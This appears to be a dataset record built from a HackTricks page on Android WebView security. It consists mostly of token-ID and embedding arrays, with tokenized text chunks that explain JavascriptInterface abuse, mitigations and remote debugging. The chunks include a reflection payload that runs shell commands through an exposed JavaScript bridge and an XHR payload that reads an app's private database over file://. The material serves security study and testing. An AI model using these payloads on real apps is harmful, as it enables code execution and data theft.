1996, 5310, 22149, 2015, 2648, 2115, 10439, 2030, 5884, 1010, 2035, 2060, 6327, 5530, 2097, 2036, 2031, 3229, 2000, 2216, 9262, 22483, 8278, 5200, 2029, 2453, 2556, 1037, 4022, 3036, 3891, 2065, 2151, 7591, 2951, 2003, 2108, 6086, 2295, 2216, 19706, 1012, 5432, 1024, 2202, 6034, 2729, 2007, 18726, 14126, 11924, 4617, 2917, 11924, 1018, 1012, 1016, 1006, 17928, 2504, 2459, 1007, 2004, 2027, 2024, 8211, 2000, 1037, 28450, 1999, 1996, 7375, 1997, 5587, 3900, 12044, 23235, 18447, 2121, 12172, 1024, 2019, 2886, 2008, 2003, 8273, 7741, 9185, 1010, 2029, 5260, 2000, 6556, 3642, 7781, 2043, 24391, 9262, 22483, 2003, 19737, 2046, 1037, 4773, 8584, 1012, 2023, 2001, 2349, 2000, 2035, 9262, 4874, 4725, 2108, 7801, 2011, 12398, 1006, 2612, 1997, 2069, 2216, 5754, 17287, 3064, 1007, 1012, 10763, 4106, 1013, 1013, 2465, 2007, 1037, 4118, 2000, 3229, 1037, 3595, 14289, 16558, 2594, 2465, 9262, 22483, 6374, 1063, 1013, 1013, 2144, 11924, 1018, 1012, 1016, 1006, 20919, 1035, 14068, 1035, 2720, 2487, 1010, 17928, 2459, 1007, 4725, 1013, 1013, 2025, 5754, 17287, 3064, 2007, 1030, 9262, 22483, 18447, 2121, 12172, 2024, 2025, 5710, 2013, 9262, 22483, 1030, 9262, 22483, 18447, 2121, 12172, 2270, 5164, 4152, 8586, 13465, 1006, 1007, 1063, 2709, 1000, 3565, 3366, 16748, 25856, 12054, 18351, 1000, 1025, 1065, 1025, 1065, 1013, 1013, 12067, 9262, 22483, 2958, 14944, 2019, 4874, 1997, 1996, 9262, 22483, 6374, 2465, 8545, 2497, 8584, 1012, 5587, 3900, 12044, 23235, 18447, 2121, 12172, 1006, 2047, 9262, 22483, 6374, 1006, 1007, 1010, 1000, 9262, 22483, 6374, 1000, 1007, 1025, 4773, 8584, 1012, 2128, 11066, 1006, 1007, 1025, 1026, 999, 1011, 1011, 18077, 2000, 2131, 1996, 3595, 2013, 9262, 22483, 1011, 1011, 1028, 1026, 5896, 1028, 9499, 1006, 9262, 22483, 6374, 1012, 4152, 8586, 13465, 1006, 1007, 1007, 1025, 1026 ]
hack_tricks
427.txt
2
/ script > with access to the javascript code, via, for example, via stored xss, mitm attack or a malicious website that is loaded inside the webview, can directly call the exposed java methods. note that in the case of trying to exploit this vulnerability via an open redirect to an attackers web page that access the native android objet. if the access to the redirection is done via a mobile browser and not using the same webview, the browser won't be able to access the native android object. if addjavascriptinterface is necessary, take the following considerations : only javascript provided with the apk should be allowed to use the bridges, e. g. by verifying the url on each bridged java method ( via webview. geturl ). no javascript should be loaded from remote endpoints, e. g. by keeping page navigation within the app's domains and opening all other domains on the default browser ( e. g. chrome, firefox ). if necessary for legacy reasons ( e. g. having to support older devices ), at least set the minimal api level to 17 in the manifest file of the app ( < uses - sdk android : minsdkversion = " 17 " / > ). javascript bridge to rce via reflectionas noted in this research ( check it for ideas in case you obtain rce ) once you found a javascriptbridge it may be possible to obtain rce via reflection using a payload like the following one : <! - - javascriptbridge is the name of the android exposed object - - > < script > function execute ( cmd ) { return javascriptbridge. getclass ( ). forname ('java. lang. runtime'). getmethod ('getruntime ', null ). invoke ( null, null ). exec ( cmd ) ; } execute ( ['/ system / bin / sh ','- c ','echo \ " mwr \ " > / mnt / sdcard / mwr. txt'] ) ; < / script > however modern applications may use the @ javascriptinterface annotation that indicates to the javascriptbridge that only the method with this annotation should be exposed. in that scenario, you won't be able to abuse reflection to execute arbitrary code. remote debuggingremote webview debugging allow to access
[ 0.032720621675252914, 0.1302552968263626, -1.0554522275924683, -0.03057747893035412, -0.40138930082321167, 0.2857990860939026, -0.48516613245010376, -0.060342833399772644, 0.5374871492385864, 0.8240941762924194, 0.10948815941810608, 0.5523918867111206, 0.18309566378593445, -0.1907094568014145, -0.24797803163528442, -0.24629941582679749, -0.6857154965400696, 0.2611367702484131, -0.5369449853897095, 0.4133363664150238, 0.7712841629981995, 0.46388405561447144, -1.0556063652038574, -0.8730764389038086, -0.6481473445892334, 0.22268594801425934, 0.8506295084953308, -0.3724188208580017, 0.4607975482940674, 0.9703152775764465, 0.10449790954589844, -0.13035903871059418, -0.24737268686294556, -0.3102937936782837, 0.08095075935125351, -0.5558284521102905, 0.9309013485908508, -0.05847102776169777, -0.2073346972465515, -0.4561777710914612, 0.27429381012916565, -0.6873717904090881, -0.11998873203992844, -0.5520102977752686, -0.6611446738243103, -0.013865604065358639, 0.6240952610969543, -0.25746485590934753, -0.10063961148262024, 0.12464537471532822, 0.23498426377773285, 0.6872004270553589, -0.3288508653640747, 0.03182695060968399, 0.17444512248039246, 0.36709561944007874, 0.3335900604724884, -0.405283659696579, -0.628633439540863, -0.06393015384674072, 0.13848648965358734, 0.5160554647445679, 0.4553692638874054, -0.5827909111976624, -0.16983620822429657, 0.6606689691543579, 0.28328147530555725, 0.1632349044084549, -0.00931517593562603, -0.4311690628528595, -0.5836588740348816, 0.4224672019481659, -0.57410728931427, -0.2593989074230194, -0.5356939435005188, -0.11690329015254974, -0.5472106337547302, -0.09395594894886017, 0.8148539066314697, 0.4405207633972168, -0.22807389497756958, 0.8390040993690491, -0.10729172080755234, -0.14998392760753632, -0.2350681871175766, 0.05453438684344292, 0.6404712796211243, 0.9972299337387085, -1.192968487739563, 0.42383164167404175, 0.1453264355659485, 0.6125868558883667, -0.6993604302406311, -0.07206945866346359, 0.5759263634681702, 0.43131205439567566, -0.40417519211769104, -0.0756780281662941, 0.2939893901348114, -0.38246259093284607, 0.9812389612197876, 0.6385522484779358, -0.6609354019165039, 0.4663790464401245, 0.03635546192526817, 0.7726607322692871, -0.48532581329345703, -0.09888916462659836, -0.08973710983991623, -0.4786052703857422, 0.376319944858551, 0.054857246577739716, -0.10856381803750992, -0.8584762811660767, 0.06130930036306381, 0.5506891012191772, 0.29507145285606384, 0.06978227198123932, -0.3016074597835541, 0.4162704050540924, 0.5116594433784485, -0.7019113302230835, 0.7897112965583801, -0.0021948630455881357, 0.7447212934494019, 0.5316022634506226, 0.6153767108917236, 0.47334036231040955, 0.15560026466846466, -0.07168491929769516, -0.1414199024438858, -0.25603342056274414, -0.41760045289993286, 1.2081059217453003, -0.6514180898666382, -0.0747988224029541, 0.3622012436389923, -0.4131655693054199, 0.4331326484680176, -0.9899076223373413, -0.4178432524204254, 0.7821536064147949, 0.3253752887248993, 1.498426914215088, 0.27736932039260864, -0.16502293944358826, -1.1112298965454102, 0.26430922746658325, -0.5762917399406433, 0.1196012943983078, 0.14625482261180878, 0.33460280299186707, 0.6587198376655579, -0.29061058163642883, -0.7078657150268555, -0.06922418624162674, -0.4535496234893799, 0.3501642048358917, 0.7785341739654541, -0.2549145221710205, -0.10662682354450226, 0.3733794391155243, -0.375863254070282, 0.47717732191085815, -0.4309057593345642, 0.315334677696228, -0.7141247987747192, -0.3843839764595032, 0.04292358458042145, 0.31547948718070984, 0.589618980884552, 0.04961680620908737, 0.4696103036403656, 0.195937842130661, 1.1749242544174194, 0.330278217792511, 0.06998226046562195, -0.059393733739852905, 0.26534563302993774, 0.3826162815093994, -0.4830301105976105, 0.40283265709877014, 0.07043080776929855, 1.1321085691452026, -0.10674488544464111, -0.1453440636396408, -0.33366653323173523, -0.2525118291378021, -0.2027030736207962, 0.2620657682418823, -0.18421675264835358, 0.7648707628250122, -0.6938784718513489, 0.541846513748169, 0.6536218523979187, 0.4168189764022827, -1.1713074445724487, 0.04344679415225983, 0.011618279851973057, -0.6889709234237671, -0.3690503239631653, 0.2690354883670807, -0.055381741374731064, 0.7111828923225403, -0.3730592727661133, 0.12652145326137543, 1.0737026929855347, 0.5166151523590088, -1.0303066968917847, 1.0421605110168457, 0.17589379847049713, 0.2481461614370346, -0.6258435249328613, 0.024990752339363098, 0.42761141061782837, -0.02928810939192772, -0.5384517312049866, 0.3453918993473053, 0.19527027010917664, -0.19051127135753632, 0.0951763316988945, 0.5571318864822388, 0.5395680069923401, 0.5146815776824951, -0.8292012214660645, -0.6331214904785156, -0.24898168444633484, -0.0651049092411995, -0.4782111644744873, -0.10738478600978851, 0.5393422842025757, 0.1824972927570343, 0.22931143641471863, 0.8230928778648376, -0.35053911805152893, -0.38937413692474365, 0.08245157450437546, 0.6185694336891174, 0.4437451660633087, -0.4563756287097931, 0.20434249937534332, 1.1842979192733765, 0.42674362659454346, 0.6524592041969299, 0.6351914405822754, 0.0923345759510994, 0.11726274341344833, -0.06549524515867233, -0.0800120010972023, 0.6018291115760803, -0.03667202964425087, 0.8791134357452393, 0.9317920804023743, -0.08257163316011429, -0.9381065964698792, -0.04095561429858208, 0.4505917429924011, 0.6397619247436523, -0.21694649755954742, -0.7783942222595215, -0.08151054382324219, 0.4972849488258362, -0.7557005882263184, -0.8621114492416382, 0.16562555730342865, -0.013592299073934555, 0.0860832929611206, 0.537132978439331, -0.2805311381816864, -1.029510498046875, -0.919884979724884, -0.7170038223266602, -0.6410650014877319, -0.6314528584480286, -1.1721967458724976, -0.25775161385536194, 0.45724958181381226, -0.7562174201011658, 0.6504220366477966, -0.01571313664317131, -0.28040939569473267, -0.6318036317825317, -0.36004775762557983, 0.7001520991325378, 0.45302391052246094, 0.278064489364624, -0.0741039514541626, 0.2642871141433716, 0.08236639201641083, 0.9013040661811829, -0.5992680788040161, -0.15702791512012482, 0.03079226240515709, 0.17234250903129578, -0.3367415964603424, 0.08462906628847122, 0.43172499537467957, -0.22730417549610138, -0.28397896885871887, -0.17967115342617035, 0.0000988039028015919, -0.27990204095840454, 0.006522843148559332, 0.24623814225196838, -0.27213600277900696, 0.42894527316093445, -0.2778654396533966, -0.4208921492099762, 0.9748907685279846, 0.5408808588981628, -0.5808659195899963, 0.29832568764686584, 0.11513566970825195, 0.43608787655830383, -0.3879780173301697, 0.8213579058647156, -0.31707730889320374, 0.595751941204071, 0.028005370870232582, -0.8190242052078247, 0.26949459314346313, -0.15666191279888153, -0.5661913752555847, -0.07313882559537888, 0.2845816910266876, 0.6171936392784119, -0.6873234510421753, -0.8051649332046509, 0.26834073662757874, -0.2438635528087616, -0.4480927586555481, -0.15356259047985077, 0.19298332929611206, 0.6851999759674072, 0.5621504187583923, 0.31891706585884094, 0.47527843713760376, -0.23292317986488342, -0.10240960866212845, 0.09628953784704208, 0.7237831354141235, -0.39748623967170715, 0.5350578427314758, -0.15630865097045898, 0.35809746384620667, 0.4051133990287781, 0.9346336722373962, -0.4846521317958832, 0.11634422838687897, -0.3223196268081665, -1.286922812461853, -0.30753400921821594, -0.4839498996734619, 0.19255560636520386, 0.04136446863412857, 0.5138390064239502, -0.16693119704723358, -0.4874587059020996, -0.3683996796607971, 0.4880567491054535, 0.9009069800376892, 0.5443869233131409, -0.1688300222158432, 0.15518450736999512, -0.5424996614456177, -0.5444744825363159, -0.14948342740535736, 0.036442432552576065, 0.6303667426109314, -0.23713958263397217, 0.5817283391952515, -0.252145379781723, -0.028435993939638138, -0.050656259059906006, -0.14565369486808777, -0.4810277819633484, 0.5161405205726624, -0.039113398641347885, 0.44856858253479004, -0.055683284997940063, -0.3277709186077118, 0.061970990151166916, 0.23122189939022064, 0.8522912263870239, 0.4361110329627991, -0.026546897366642952, -0.611129641532898, 0.1045292541384697, 0.13385358452796936, 0.6583143472671509, 0.050947196781635284, -0.04122480750083923, 0.8568931221961975, -0.14693589508533478, -0.2982732057571411, -0.5722457766532898, 0.32495513558387756, 0.43150895833969116, 0.166426882147789, 0.061746858060359955, 0.030657975003123283, 0.07353812456130981, 0.06747996062040329, 0.8575376272201538, -0.8739840388298035, 0.05749374255537987, -0.4968594014644623, 0.8996459245681763, -0.2680962383747101, -0.04402483254671097, -0.052614763379096985, -0.1518818885087967, -0.1898466944694519, -0.581490159034729, 0.6761252880096436, -0.08330174535512924, -0.1586063802242279, -0.11237192898988724, 0.6492889523506165, 0.503434419631958, 0.0021100323647260666, -0.655504584312439, -0.06867711246013641, 0.03790520131587982, 1.0156571865081787, -0.8438225388526917, -0.22950515151023865, -1.1354609727859497, -0.10905075818300247, 0.5226367115974426, 0.17236506938934326, -0.44452551007270813, -0.8100865483283997, -0.7235718369483948, -0.4349812865257263, 0.4882237911224365, 0.9391834139823914, -0.34603407979011536, -0.32033824920654297, -0.6716498732566833, -0.08499021828174591, 0.8766309022903442, 0.3346135914325714, -0.5998664498329163, -0.25842759013175964, 0.311005175113678, -0.216349795460701, 0.3311566412448883, -0.8396273851394653, 0.18510738015174866, -0.10493957996368408, -0.7524495720863342, 0.9335074424743652, -0.2607971429824829, -0.18120458722114563, 0.01818235218524933, -0.17628425359725952, 0.2079961597919464, 0.9675990343093872, -0.54998379945755, 0.09754583984613419, -0.3909979462623596, -0.012702345848083496, -0.5442827343940735, -0.3311808407306671, 0.31284692883491516, 0.17933306097984314, -0.19853302836418152, 0.23553411662578583, 0.6866629123687744, 0.16392271220684052, 0.34016743302345276, -0.654474139213562, -0.39135104417800903, 0.3226412236690521, -0.611761748790741, 0.7078563570976257, 0.4759685695171356, -0.349105566740036, -0.016013847663998604, -1.1612324714660645, 0.4835328459739685, -0.08983902633190155, 0.14747262001037598, -0.7731310129165649, -0.014828181825578213, 0.16827665269374847, 0.08031188696622849, -0.2525462210178375, 0.19770050048828125, -0.013681591488420963, 0.08755023777484894, 0.27074965834617615, 0.6920099258422852, -0.7155275940895081, -0.7252557277679443, -0.14064544439315796, -0.36621326208114624, -0.4591669738292694, 0.016356157138943672, 0.8768209218978882, -0.1497764140367508, -0.8293024897575378, 0.39911404252052307, -0.3021788001060486, 0.2657548487186432, -0.6812587380409241, 0.2526792883872986, -0.3649353086948395, -0.07163406163454056, -0.10047272592782974, 0.33567529916763306, -0.1407477706670761, -0.12866561114788055, 0.3618803322315216, 0.5588375926017761, 0.5634182095527649, -0.11372129619121552, -0.12856525182724, 0.6697331666946411, -0.07672283798456192, -0.5174921751022339, 0.025144478306174278, 0.47356361150741577, -0.3503285348415375, 0.2135217785835266, -0.2669220268726349, -0.47560977935791016, -1.153631329536438, -0.793226957321167, 0.21735990047454834, -0.0651378482580185, 0.06739312410354614, -0.41286060214042664, 0.13877040147781372, -0.3709098696708679, 0.8607140779495239, -0.024378038942813873, -0.35757017135620117, 0.28313910961151123, -0.0972355455160141, 0.5044475793838501, 0.17931732535362244, 0.1413651704788208, -0.3407651484012604, -0.6555665135383606, 0.10037432610988617, 0.06760797649621964, 0.7192571759223938, -0.10689149796962738, -0.26101723313331604, -0.38816022872924805, 0.5233421921730042, -0.2563658058643341, -0.6270037889480591, -0.43070223927497864, 0.09729549288749695, -0.12836340069770813, -0.9424709677696228, 0.41118475794792175, -0.7196064591407776, 0.1706678420305252, 0.3804541230201721, 0.17664368450641632, -0.05208391696214676, -0.1165444627404213, 0.24890932440757751, 0.4572924077510834, 0.34540653228759766, -0.7915918827056885, -0.3497282564640045, 0.18456019461154938, 0.605250895023346, -0.10922937840223312, -0.3215215504169464, -0.8289840221405029, -0.22554150223731995, -1.1822420358657837, -1.2569005489349365, 0.16818198561668396, -0.06774108111858368, 0.027038391679525375, -0.4920582175254822, -0.7258117198944092, 0.7094797492027283, -0.36566582322120667, 0.1397249847650528, 0.733761727809906, -0.11109104752540588, 0.26631924510002136, -0.2193262279033661, 0.4804157316684723, 0.02318127453327179, -0.8229511976242065, -0.21628066897392273, -0.25406232476234436, 0.3187437951564789, 0.07796186208724976, -0.27313268184661865, 0.10144279897212982, -0.6264179944992065, -0.047973841428756714, 0.07421138137578964, -0.31607234477996826, 0.4696025252342224, 0.16142691671848297, -1.106288194656372, -0.9655280709266663, 0.16759952902793884, 0.5411565899848938, -0.2783720791339874, 0.6937513947486877, -0.015522221103310585, 0.08560001850128174, -0.13483288884162903, -0.22741064429283142, 0.017107365652918816, -0.007670988328754902, 0.6932192444801331, -0.20810440182685852, -0.355252206325531, 0.2676631808280945, 0.06638389080762863, -0.9409822821617126, -0.4945890009403229, -0.31128159165382385, 0.1030140221118927, 0.13817697763442993, -0.2664079964160919, -0.6567835211753845, -0.1963253915309906, 0.9111188054084778, -0.295450896024704, 0.5066689848899841, 0.08836758136749268, 0.11480456590652466, 0.03723027929663658, 0.12130419164896011, -0.3347419202327728, 0.5193348526954651, 0.8487088084220886, -0.3093626797199249, -0.4783432185649872, -0.5644006729125977, -0.2400687336921692, -0.06288161128759384, -0.2820666432380676, 1.2908494472503662, -0.44203415513038635, 0.2837013900279999, 0.24400921165943146, -0.013385516591370106, 0.9267810583114624, -0.21643316745758057, 0.3653656244277954, 1.2342629432678223, 0.30373623967170715, -0.7500069737434387, -0.13905173540115356, 0.044115956872701645, 0.1641061156988144, -0.47741276025772095, -0.4209565222263336, -0.26032379269599915, 0.5887489318847656, 0.9056002497673035, -0.05557877942919731, -0.5951223969459534, -1.1713367700576782, -0.9315807819366455, -0.18523317575454712, 0.20997817814350128, 0.26835897564888, 0.1173136755824089, 0.030830109491944313, -0.30654919147491455, -0.4822651147842407, 0.06362585723400116, 0.3880118429660797, -0.27297836542129517, 0.574344277381897, -0.8187669515609741, -0.33859002590179443, -0.6194205284118652, -0.7273498773574829, -0.6619372963905334, -0.2995946705341339, -0.5392983555793762, -0.5227064490318298, 0.16344034671783447, -0.008385851979255676, -1.2751535177230835, 0.07272501289844513, -0.8218019604682922, 0.49740174412727356, 0.20793403685092926, -0.6263050436973572, 0.5260074734687805, 0.3540525436401367, -0.03507934510707855, 0.1559710055589676, -0.319394588470459, 0.14854975044727325, -0.10981163382530212, -0.34953075647354126, -0.03211024031043053, 0.2588997781276703, 0.8124487996101379, -0.09408821910619736, -0.021226808428764343, 0.11699748784303665, 0.4489525258541107, -0.09966179728507996, -0.28862491250038147, 0.09996012598276138, -0.5337074398994446, -0.2183820605278015, -0.23425647616386414, -0.1193377822637558, 1.3819252252578735, 0.8814991116523743, 0.4088764190673828, 0.14259736239910126, -0.43751657009124756, 0.6421613097190857, 0.37024492025375366, 0.14258389174938202, 0.45361918210983276, -0.3022823929786682, 0.5324321389198303, -0.5435072183609009, 0.044130533933639526, -0.4449703097343445, -0.3107619881629944, 0.01869831420481205, 0.08661265671253204, -0.03426160290837288, -0.5132113695144653, -0.15118688344955444, 0.1751934289932251, 0.40875867009162903, 0.6643137335777283, 0.20056693255901337, 0.44549858570098877, 0.06512782722711563, -0.8161991238594055, 0.20081347227096558, -1.1006420850753784, -0.20911256968975067, 0.26379045844078064, -0.45461833477020264, -0.2349322885274887, -0.6007680296897888, -0.005401208531111479, -0.8324049711227417, 0.054151710122823715, -0.433402955532074, -0.07938902825117111, 0.2937294542789459, 0.48463186621665955, 1.3074939250946045, -0.2896278500556946, -0.726677417755127, 0.10790106654167175, 0.646515965461731, -0.8580412268638611, -0.6556601524353027, -0.21343176066875458, 0.5137491226196289, 0.4711407423019409, -0.9251366853713989, -0.0758143812417984, -0.2101423293352127, 0.12170183658599854, 0.511391282081604, 0.1650061458349228, -0.3584091067314148, -0.9491159915924072, 0.7777999639511108, -0.9337982535362244, -0.034348394721746445, 0.37369504570961, -0.0742800161242485, 0.14179542660713196, 0.2725285291671753, 0.16163189709186554, 0.14699137210845947, 0.36400482058525085, 0.4381043016910553, 0.5297483801841736, 0.2506156861782074, 0.6962127089500427, -0.3400913178920746, -0.044380832463502884, -0.39653119444847107, -0.12343308329582214, 0.46901026368141174, 0.4710322618484497, 0.3501596450805664, 0.4457804262638092, 0.6167137622833252, -0.25445425510406494, -0.3937147557735443, 0.44471877813339233, -0.10583232343196869, -0.3245353400707245, 0.25628089904785156, 0.19972598552703857, 0.17826612293720245, -0.06824033707380295, -0.5619456768035889, -0.19450770318508148, -0.5486267805099487, -0.04318125545978546, -0.7423765063285828, -0.1154196485877037, 0.913752555847168, -0.9638524651527405, 1.0621886253356934, -0.562231719493866, -0.3208581209182739, 0.5936064124107361, 0.06968100368976593, -0.8709836006164551, 0.7130659818649292, 0.9672714471817017, 0.5334173440933228, -0.23016953468322754, 0.4663931429386139, 0.1948852390050888, -0.09357058256864548, 0.30307042598724365, -0.5273228287696838, -0.28239771723747253, 0.15165887773036957, 0.5300572514533997, -0.3712351322174072, -0.5320745706558228, 0.45257019996643066, 0.6345796585083008, 0.19644446671009064, 0.4035109281539917, -0.4544185400009155, -0.2273668348789215, 0.05174567550420761, -0.009354899637401104, -0.4156050682067871, -0.4816322326660156, 0.033430855721235275, -0.13328735530376434, -0.58360356092453, 0.9108180999755859, -0.3174080550670624, 0.649395763874054, -0.15741069614887238, 0.5572636723518372, -0.6344003677368164, 0.2614392638206482, -0.21095648407936096, -0.5581455230712891, -0.674570620059967, 0.13876858353614807, -0.28045371174812317, -0.3661663830280304, -0.2316300868988037, -0.28194916248321533, -0.27698445320129395, -0.3456174433231354, -0.6448408961296082, -1.148637294769287, -0.140731081366539, -0.4293100833892822, -0.7688836455345154, 0.2671537399291992, -0.32396605610847473, -0.8718617558479309, 0.3306956887245178, -0.08558829128742218, 0.230234757065773, -0.006788507103919983, -0.12573090195655823, 0.0942109003663063, -0.21261931955814362, -0.3521680235862732, -0.4580434560775757, -0.28914177417755127, -0.06600916385650635, -0.523048996925354, 0.14400197565555573, -0.5672910213470459, -0.9028766751289368, -0.15072062611579895, 0.08972890675067902, -0.4290483295917511, 0.7164726853370667, 0.5726670622825623, 0.25890716910362244, 0.4320625066757202, -0.47625863552093506, -0.001576844835653901, 0.17016072571277618, 0.12326424568891525, -0.13785302639007568, 0.8554062247276306, 0.6610881090164185, 0.2086462676525116, 0.08870021253824234, -0.010701869614422321, 0.7631113529205322, 0.024456845596432686, -0.3908807933330536, -0.4888153672218323, -0.06231207773089409, -0.9508861303329468, -0.15856286883354187, -0.10370322316884995, -0.44541868567466736, -0.7740739583969116, -0.2906751036643982, -0.9416155815124512, -0.024626504629850388, -0.29296597838401794, 0.2776384651660919, 0.21676518023014069, 0.055711641907691956, 0.057112861424684525, -0.5345789790153503, 0.6510746479034424, -0.8611745834350586, 4.372561931610107, 0.4385262131690979, -0.28427186608314514, 0.03593278303742409, 0.13332757353782654, 0.8491547107696533, 0.6577451229095459, -0.7195290327072144, 0.05818662419915199, -0.20291903614997864, 0.5202409625053406, -0.16994114220142365, 0.1795274317264557, 0.8783909678459167, 0.23292571306228638, 0.22232507169246674, -0.4027528762817383, -0.11583810299634933, 0.2688709497451782, -1.2121284008026123, -1.1036922931671143, 0.10126509517431259, 0.04061794653534889, 0.5168027281761169, 0.5280155539512634, 0.3569105565547943, -0.013758886605501175, -0.6097017526626587, -0.621272623538971, -0.6482571363449097, 0.03122786432504654, -0.1100652813911438, 0.41931286454200745, 0.10790073126554489, -0.281147837638855, -0.1308022439479828, 0.38574936985969543, -0.37940117716789246, -0.10573533177375793, 0.2154034823179245, 0.27252718806266785, -0.24195104837417603, -0.19722338020801544, -0.5469604134559631, 0.207269087433815, -0.0216265469789505, -0.29964300990104675, 0.24439305067062378, 0.24728061258792877, -0.7076868414878845, 0.7185479402542114, -0.5752906203269958, 0.5782937407493591, 0.011152236722409725, 0.22545213997364044, 0.3690478503704071, 0.05282707139849663, 0.0013260709820315242, -0.08587515354156494, -0.012587219476699829, 0.8267636895179749, -0.9658041000366211, -0.44971540570259094, -0.2096923142671585, -1.3015862703323364, 0.3549458682537079, -0.05962643772363663, 0.2913835048675537, 0.45620739459991455, 0.23171411454677582, -0.27305132150650024, -0.01892024278640747, -0.7478089332580566, -0.5414584279060364, 0.7932559251785278, 0.2597588300704956, 0.4781409502029419, 0.5713400840759277, 1.0934810638427734, 0.1044069230556488, 0.4333515167236328, 0.20318464934825897, -0.7391026020050049, 0.6030891537666321, 1.0759215354919434, 0.5212406516075134, -0.20568476617336273, -0.6947826147079468, -0.032516635954380035, 0.4577561616897583, 0.2089877724647522, 0.0592954121530056, -0.0016542105004191399, -0.5387664437294006, 0.29050561785697937 ]
[ 1013, 5896, 1028, 2007, 3229, 2000, 1996, 9262, 22483, 3642, 1010, 3081, 1010, 2005, 2742, 1010, 3081, 8250, 1060, 4757, 1010, 10210, 2213, 2886, 2030, 1037, 24391, 4037, 2008, 2003, 8209, 2503, 1996, 4773, 8584, 1010, 2064, 3495, 2655, 1996, 6086, 9262, 4725, 1012, 3602, 2008, 1999, 1996, 2553, 1997, 2667, 2000, 18077, 2023, 18130, 3081, 2019, 2330, 2417, 7442, 6593, 2000, 2019, 17857, 4773, 3931, 2008, 3229, 1996, 3128, 11924, 27885, 15759, 1012, 2065, 1996, 3229, 2000, 1996, 2417, 7442, 7542, 2003, 2589, 3081, 1037, 4684, 16602, 1998, 2025, 2478, 1996, 2168, 4773, 8584, 1010, 1996, 16602, 2180, 1005, 1056, 2022, 2583, 2000, 3229, 1996, 3128, 11924, 4874, 1012, 2065, 5587, 3900, 12044, 23235, 18447, 2121, 12172, 2003, 4072, 1010, 2202, 1996, 2206, 16852, 1024, 2069, 9262, 22483, 3024, 2007, 1996, 9706, 2243, 2323, 2022, 3039, 2000, 2224, 1996, 7346, 1010, 1041, 1012, 1043, 1012, 2011, 20410, 2075, 1996, 24471, 2140, 2006, 2169, 2958, 2094, 9262, 4118, 1006, 3081, 4773, 8584, 1012, 2131, 3126, 2140, 1007, 1012, 2053, 9262, 22483, 2323, 2022, 8209, 2013, 6556, 2203, 26521, 1010, 1041, 1012, 1043, 1012, 2011, 4363, 3931, 9163, 2306, 1996, 10439, 1005, 1055, 13100, 1998, 3098, 2035, 2060, 13100, 2006, 1996, 12398, 16602, 1006, 1041, 1012, 1043, 1012, 18546, 1010, 2543, 14876, 2595, 1007, 1012, 2065, 4072, 2005, 8027, 4436, 1006, 1041, 1012, 1043, 1012, 2383, 2000, 2490, 3080, 5733, 1007, 1010, 2012, 2560, 2275, 1996, 10124, 17928, 2504, 2000, 2459, 1999, 1996, 19676, 5371, 1997, 1996, 10439, 1006, 1026, 3594, 1011, 17371, 2243, 11924, 1024, 8117, 16150, 2243, 27774, 1027, 1000, 2459, 1000, 1013, 1028, 1007, 1012, 9262, 22483, 2958, 2000, 22110, 2063, 3081, 9185, 3022, 3264, 1999, 2023, 2470, 1006, 4638, 2009, 2005, 4784, 1999, 2553, 2017, 6855, 22110, 2063, 1007, 2320, 2017, 2179, 1037, 9262, 22483, 6374, 2009, 2089, 2022, 2825, 2000, 6855, 22110, 2063, 3081, 9185, 2478, 1037, 18093, 2066, 1996, 2206, 2028, 1024, 1026, 999, 1011, 1011, 9262, 22483, 6374, 2003, 1996, 2171, 1997, 1996, 11924, 6086, 4874, 1011, 1011, 1028, 1026, 5896, 1028, 3853, 15389, 1006, 4642, 2094, 1007, 1063, 2709, 9262, 22483, 6374, 1012, 2131, 26266, 1006, 1007, 1012, 2005, 18442, 1006, 1005, 9262, 1012, 11374, 1012, 2448, 7292, 1005, 1007, 1012, 2131, 11368, 6806, 2094, 1006, 1005, 2131, 15532, 7292, 1005, 1010, 19701, 1007, 1012, 1999, 6767, 3489, 1006, 19701, 1010, 19701, 1007, 1012, 4654, 8586, 1006, 4642, 2094, 1007, 1025, 1065, 15389, 1006, 1031, 1005, 1013, 2291, 1013, 8026, 1013, 14021, 1005, 1010, 1005, 1011, 1039, 1005, 1010, 1005, 9052, 1032, 1000, 12464, 2099, 1032, 1000, 1028, 1013, 24098, 2102, 1013, 17371, 11522, 1013, 12464, 2099, 1012, 19067, 2102, 1005, 1033, 1007, 1025, 1026, 1013, 5896, 1028, 2174, 2715, 5097, 2089, 2224, 1996, 1030, 9262, 22483, 18447, 2121, 12172, 5754, 17287, 3508, 2008, 7127, 2000, 1996, 9262, 22483, 6374, 2008, 2069, 1996, 4118, 2007, 2023, 5754, 17287, 3508, 2323, 2022, 6086, 1012, 1999, 2008, 11967, 1010, 2017, 2180, 1005, 1056, 2022, 2583, 2000, 6905, 9185, 2000, 15389, 15275, 3642, 1012, 6556, 2139, 8569, 12588, 28578, 12184, 4773, 8584, 2139, 8569, 12588, 3499, 2000, 3229 ]
hack_tricks
427.txt
3
the webview with the chrome developer tools. the device needs to be accessible by the pc ( via usb, local emulator, local network... ) and running the debuggable webview, then access chrome : / / inspect / # devices : select inspect and a new window will be opened. in this windows you can interact with the content of the webview and even make it execute arbitrary js code from the console tab : in order to enable webview remote debugging you can do something like : if ( build. version. sdk _ int > = build. version _ codes. kitkat ) { webview. setwebcontentsdebuggingenabled ( true ) ; } this setting applies to all of the application's webviews. webview debugging is not affected by the state of the debuggable flag in the application's manifest. if you want to enable webview debugging only when debuggable is true, test the flag at runtime. if ( build. version. sdk _ int > = build. version _ codes. kitkat ) { if ( 0! = ( getapplicationinfo ( ). flags & applicationinfo. flag _ debuggable ) ) { webview. setwebcontentsdebuggingenabled ( true ) ; } } payloadsexfiltrate arbitrary filesvar xhr = new xmlhttprequest ( ) ; xhr. onreadystatechange = function ( ) { if ( xhr. readystate = = xmlhttprequest. done ) { alert ( xhr. responsetext ) ; } } xhr. open ('get ','file : / / / data / data / com. authenticationfailure. wheresmybrowser / databases / super _ secret. db ', true ) ; xhr. send ( null ) ; [SEP]
